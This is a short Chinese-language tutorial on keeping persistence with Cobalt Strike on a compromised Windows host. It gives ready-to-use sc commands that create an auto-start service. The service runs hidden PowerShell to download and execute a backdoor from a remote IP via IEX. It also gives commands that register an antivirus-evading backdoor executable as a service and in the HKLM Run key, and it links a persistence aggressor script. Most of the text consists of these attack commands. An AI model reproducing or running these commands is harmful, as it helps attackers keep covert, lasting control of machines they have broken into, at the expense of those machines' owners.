Cobalt Strike权限维持

比较菜，目前需要上线的目标是system权限

1、sc创建自启动服务

以下命令都是在cs中执行的，在cmd中测试只需要删掉前面的shell就行

先创建一个服务（需要system权限）

shell sc create "shell" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.123.54/后门文件'))\""

 

 

 因为是拿自己的电脑测试的，直接用win+r启动services.msc来查看服务状态确认一下，此时还是手动的。

 

 

 设置自启动

shell sc config "shell" start= auto

设置描述

shell sc description "shell" "shell persistence"

启动服务

shell net start "shell"

删除服务

shell sc delete "shell"

 

如果没有公网IP，也可以上传一个免杀后门到目标上，也是使用sc配置一个自启动服务来进行权限维持　　

sc create "shell_local" binpath= "C:\Users\Public\BypassAV.exe（文件路径）"

sc description "shell_local" "shell_local_persistence"

sc config "shell_local" start= auto

net start "shell_local"

 

2、注册表自启动

同样需要先需要上传一个免杀后门

命令shell reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "shell_regedit" /t REG_SZ /d "C:\Users\Public\BypassAV.exe（文件路径）" /f

要删除也简单shell reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "shell_regedit"

 当然、也可以采用插件

https://github.com/ZonkSec/persistence-aggressor-script